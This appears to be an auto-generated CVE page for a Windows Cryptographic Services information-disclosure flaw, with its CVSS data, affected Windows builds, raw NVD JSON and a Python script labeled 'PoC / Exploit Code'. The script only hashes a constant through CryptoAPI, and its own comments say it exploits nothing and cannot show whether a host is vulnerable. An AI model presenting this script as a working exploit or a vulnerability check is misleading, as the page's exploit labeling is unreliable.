Security Vulnerability Report
CVE-2025-58720 CVSS 7.8 HIGH

CVE-2025-58720

Published: 2025-10-14 17:15:53
Last Modified: 2025-11-07 20:21:24

Description

Use of a cryptographic primitive with a risky implementation in Windows Cryptographic Services allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* - VULNERABLE
Microsoft Windows 10 (all supported versions)
Microsoft Windows 11 (all supported versions)
Microsoft Windows Server 2019
Microsoft Windows Server 2022
Microsoft Windows Server 2025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
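# CVE-2025-58720 - Windows Cryptographic Services: CryptoAPI hashing walkthrough
#
# The advisory text for this CVE says only that a cryptographic primitive with
# a risky implementation allows local information disclosure; it gives no
# technical detail of the flaw. This script does not reach any such code path.
# It opens a verification-only provider context, hashes a constant that the
# script itself supplies, and prints the digest. Nothing is read from another
# process, user or key container, so its output says nothing about whether a
# host is vulnerable or patched; for that, compare the OS build with the fixed
# builds listed in the advisory data.
import subprocess
import sys
import os
import ctypes
from ctypes import wintypes

# Windows Cryptographic API libraries. They are loaded only on Windows so that
# importing this module elsewhere reaches the platform check in main() instead
# of failing on the missing ctypes.WinDLL/windll attribute.
# use_last_error=True makes ctypes save the thread's last-error value right
# after each call, so ctypes.get_last_error() reports the failing API call.
_ON_WINDOWS = sys.platform == "win32"
ADVAPI32 = ctypes.WinDLL("advapi32", use_last_error=True) if _ON_WINDOWS else None
CRYPT32 = ctypes.WinDLL("crypt32", use_last_error=True) if _ON_WINDOWS else None

# Cryptographic Service Provider (CSP) type, provider name and context flags
PROV_RSA_AES = 24
CRYPT_VERIFYCONTEXT = 0xF0000000
MS_ENH_RSA_AES_PROV = "Microsoft Enhanced RSA and AES Cryptographic Provider"

# Hash algorithm and parameter identifiers (wincrypt.h).
# CALG_SHA_256 is 0x0000800C; 0x00008003 is CALG_MD5 and yields 16 bytes.
CALG_SHA_256 = 0x0000800C
HP_HASHVAL = 0x0002
SHA256_DIGEST_SIZE = 32


class CryptoExploit:
    """Hold a CryptoAPI provider context and one hash object.

    The class and method names are kept for existing callers. The class only
    performs ordinary, documented CryptoAPI calls; it does not exploit
    anything.
    """

    def __init__(self):
        # Handles start out NULL and are filled in by the API calls below.
        self.hProv = wintypes.HANDLE()
        self.hKey = wintypes.HANDLE()
        self.hHash = wintypes.HANDLE()

    def acquire_context(self):
        """Acquire a verification-only context on the RSA/AES provider.

        CRYPT_VERIFYCONTEXT asks for a context that does not need access to
        persisted private keys, so no key container is named.

        Returns:
            True when the context was acquired, False otherwise (including
            when the CryptoAPI libraries are not loaded on this platform).
        """
        if ADVAPI32 is None:
            print("[-] CryptoAPI is only available on Windows")
            return False

        result = ADVAPI32.CryptAcquireContextW(
            ctypes.byref(self.hProv),
            None,
            MS_ENH_RSA_AES_PROV,
            PROV_RSA_AES,
            CRYPT_VERIFYCONTEXT,
        )
        if not result:
            print(
                "[-] Failed to acquire crypto context. "
                f"Error: {ctypes.get_last_error()}"
            )
            return False
        print("[+] Crypto context acquired successfully")
        return True

    def exploit_risky_primitive(self):
        """Hash a fixed sample with SHA-256 through CryptoAPI and print it.

        This is a plain create-hash / hash-data / read-digest sequence. The
        digest printed is that of a constant defined in this method, so no
        information is disclosed and no vulnerable code path is exercised.

        Returns:
            True when every API call succeeded, False on the first failure.
        """
        if not self.acquire_context():
            return False

        try:
            # Step 1: create the hash object.
            created = ADVAPI32.CryptCreateHash(
                self.hProv,
                CALG_SHA_256,
                0,
                0,
                ctypes.byref(self.hHash),
            )
            if not created:
                print(f"[-] CryptCreateHash failed. Error: {ctypes.get_last_error()}")
                return False
            print("[+] Hash object created")

            # Step 2: feed the sample bytes (a constant, not a real secret).
            sensitive_data = b"SecretKeyMaterial_12345"
            hashed = ADVAPI32.CryptHashData(
                self.hHash,
                sensitive_data,
                len(sensitive_data),
                0,
            )
            if not hashed:
                print(f"[-] CryptHashData failed. Error: {ctypes.get_last_error()}")
                return False
            print("[+] Sample data hashed with SHA-256")

            # Step 3: read the digest back. hash_size is in/out: buffer size
            # going in, number of bytes written coming out.
            hash_size = wintypes.DWORD(SHA256_DIGEST_SIZE)
            hash_value = ctypes.create_string_buffer(SHA256_DIGEST_SIZE)
            fetched = ADVAPI32.CryptGetHashParam(
                self.hHash,
                HP_HASHVAL,
                hash_value,
                ctypes.byref(hash_size),
                0,
            )
            if not fetched:
                print(
                    f"[-] CryptGetHashParam failed. Error: {ctypes.get_last_error()}"
                )
                return False

            # Print only the bytes the API reported, not the whole buffer.
            digest = hash_value.raw[: hash_size.value]
            print(f"[+] Hash value extracted: {digest.hex()}")
            print(
                "[*] Standard CryptoAPI hash completed; "
                "no vulnerable code path was exercised"
            )
            return True
        finally:
            # Release both handles on every path and reset them to NULL so a
            # second call cannot destroy or release a stale handle.
            if self.hHash:
                ADVAPI32.CryptDestroyHash(self.hHash)
                self.hHash = wintypes.HANDLE()
            ADVAPI32.CryptReleaseContext(self.hProv, 0)
            self.hProv = wintypes.HANDLE()


def main():
    """Print the banner, check the platform and run the hashing sequence."""
    print("=" * 60)
    print("CVE-2025-58720 - Windows Cryptographic Services PoC")
    print("Cryptographic Primitive Misuse - Local Info Disclosure")
    print("=" * 60)

    if sys.platform != 'win32':
        print("[-] This PoC requires Windows OS")
        sys.exit(1)

    exploit = CryptoExploit()
    if not exploit.exploit_risky_primitive():
        sys.exit(1)


if __name__ == "__main__":
    main()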

References

Raw JSON Data

{"cve": {"id": "CVE-2025-58720", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:53.463", "lastModified": "2025-11-07T20:21:24.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of a cryptographic primitive with a risky implementation in Windows Cryptographic Services allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1240"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "B51B700D-B45F-4A8E-9F78-67A1282B3BEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6456", "matchCriteriaId": "1485A427-10FF-4C39-9911-4C6F1820BE7F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6456", "matchCriteriaId": "26CAACAA-3FE8-4740-8CF2-6BF3D069C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22621.6060", "matchCriteriaId": "6F387FA2-66C8-4B70-A537-65806271F16A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6060", 
"matchCriteriaId": "A3FEBF91-5010-4C84-B93A-6EFA4838185A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "72C1771B-635B-41E3-84AF-8822467A1869"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58720", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}